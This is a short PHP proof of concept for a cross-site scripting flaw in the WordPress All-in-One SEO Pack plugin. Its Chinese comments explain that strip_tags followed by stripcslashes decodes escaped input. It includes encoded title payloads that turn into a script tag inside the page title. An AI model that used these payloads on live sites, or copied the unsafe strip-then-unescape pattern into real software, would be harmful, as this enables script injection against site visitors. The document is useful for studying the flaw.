Wordpress Plugin[All-in-one-seo-pack] Xss

<?php

function replace_title($content, $title) {

        //去除HTML标签,以为安全了

        $title = trim(strip_tags($title));

        

        $title_tag_start = "<title>";

        $title_tag_end = "</title>";

        $len_start = strlen($title_tag_start);

        $len_end = strlen($title_tag_end);



        //这里转义出了问题

        $title = stripcslashes(trim($title));

        $start = strpos($content, $title_tag_start);

        $end = strpos($content, $title_tag_end);

        

        $title_start = $start;

        $title_end = $end;

        $orig_title = $title;

        

        if ($start && $end) {

                $header = substr($content, 0, $start + $len_start) . $title .  substr($content, $end);

        } else {

                // this breaks some sitemap plugins (like wpg2)

                //$header = $content . "<title>$title</title>";

                

                $header = $content;

        }

        

        return $header;

}



$content = '<html><title>mytitle</title><body>mybody</body></html>';

$title         = 'eviltitle';

$title         = '<del>eviltitle</del>';

$title         = '\x3c/title>\x3cscript>alert("xss");\x3c/script>';

$title         = '\74/title>\74script>alert("xss");\74/script>';

echo replace_title($content, $title);

?>